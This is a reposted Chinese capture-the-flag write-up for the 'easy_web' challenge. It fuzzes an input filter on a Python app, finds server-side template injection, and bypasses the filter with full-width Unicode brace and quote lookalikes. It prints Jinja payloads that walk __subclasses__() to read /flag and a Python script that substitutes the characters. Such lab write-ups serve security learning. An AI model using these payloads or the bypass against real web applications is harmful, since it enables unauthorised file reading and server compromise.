当前位置:网站首页>攻防世界--easy_web

攻防世界--easy_web

2022-07-26 05:11:00 jjj34

目录

 补充SSTI利用到的函数及payload


1.拿到题目后,进行目录扫描,可惜没扫出来有用的东西

2.有一个输入框,随便输一个参数并且通过bp抓包查看

两个注意点: 1.Python/3.7.12 看到python写的,就想到了SSTI模板注入

确定了服务器会将我们输入的参数当作html语言解析。 

 2.看返回的字段,应该是有过滤的

对输入框进行模糊测试

测试的返回是所有的单字符,即 ascii中 33-127的所有字符(特殊符号,字母大小写,数字)

length为198的就是被过滤掉的

4.怎么绕过过滤

根据题意,我们可以通过特殊字符来绕过

特殊字符的网站:符号大全-特殊符号-特殊符号大全 (fhdq.net)

直接输入 { 会被过滤掉,因此我们可以输入  ︷

对比发现,两种特殊符号都可以解析成 { 

 对过滤进行一个小总结

{ -> ︷/﹛
} -> ︸/﹜
' -> '

 5.利用找好的过滤条件进行解题

{
   {''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}

变为

 

 替换成功

利用python进行字符的替换

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> '
, -> ,
"""
str='{
   {\'\'.__class__.__mro__[1].__subclasses__()[91].get_data(0,\'/flag\')}}' #原字符串


#如果需要替换replace(被替换的字符,替换后的字符)
str=str.replace('{','︷')
str=str.replace('}','︸')
str=str.replace('\'',''')

print(str)

原网站

版权声明
本文为[jjj34]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_44418229/article/details/125970622